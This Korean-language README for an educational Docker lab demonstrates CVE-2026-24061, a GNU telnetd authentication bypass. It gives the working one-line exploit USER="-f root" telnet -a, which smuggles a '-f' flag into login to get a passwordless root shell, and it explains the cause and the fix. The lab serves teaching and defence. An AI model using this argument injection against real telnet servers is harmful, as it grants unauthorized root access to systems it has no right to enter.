
# CVE-2026-24061 교육용 Docker 랩 GNU telnetd의 인증 우회 취약점인 CVE-2026-24061을 시연하는 교육용 Docker 랩으로, USER 환경 변수의 인자 주입을 통해 루트 접근을 허용합니다.
이 저장소는 CVE-2026-24061 취약점을 시연하기 위한 간단한 Docker 실습 환경을 포함하고 있습니다. 이 취약점은 Linux의 GNU telnetd에서 인증 우회 및 root 접근을 허용합니다.
목적은 전적으로 교육용입니다.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
다른 터미널에서 다음을 실행하세요:
USER="-f root" telnet -a localhost 2323
이후 비밀번호 요청 없이 root로 직접 접근이 허용됩니다.
이 결함은 /usr/bin/login 유틸리티 호출 중 인수 주입으로 인해 발생합니다. telnetd는 login을 호출하는 데 사용되는 명령줄을 동적으로 구성하며, %U 플레이스홀더를 통해 USER 환경 변수 값을 어떠한 검증 없이 포함합니다.
login 유틸리티는 비밀번호 인증을 무시하는 -f 옵션을 허용하므로, 공격자는 USER="-f root"를 설정하여 root로 직접 로그인을 강제할 수 있습니다.
telnetd는 높은 권한으로 실행되므로, 이러한 조작은 유효한 자격 증명 없이 즉시 root 셸을 얻는 결과를 초래합니다. 익스플로잇은 간단하고 사전 상호작용이 필요하지 않으며 쉽게 자동화할 수 있어 CVSS 9.8 점수를 정당화합니다.
이 취약점은 USER 변수에 대한 검증 및 검열 도입으로 수정되었으며, 하이픈으로 시작하는 값과 특수 문자를 차단하여 login에 대한 인수 주입을 방지합니다.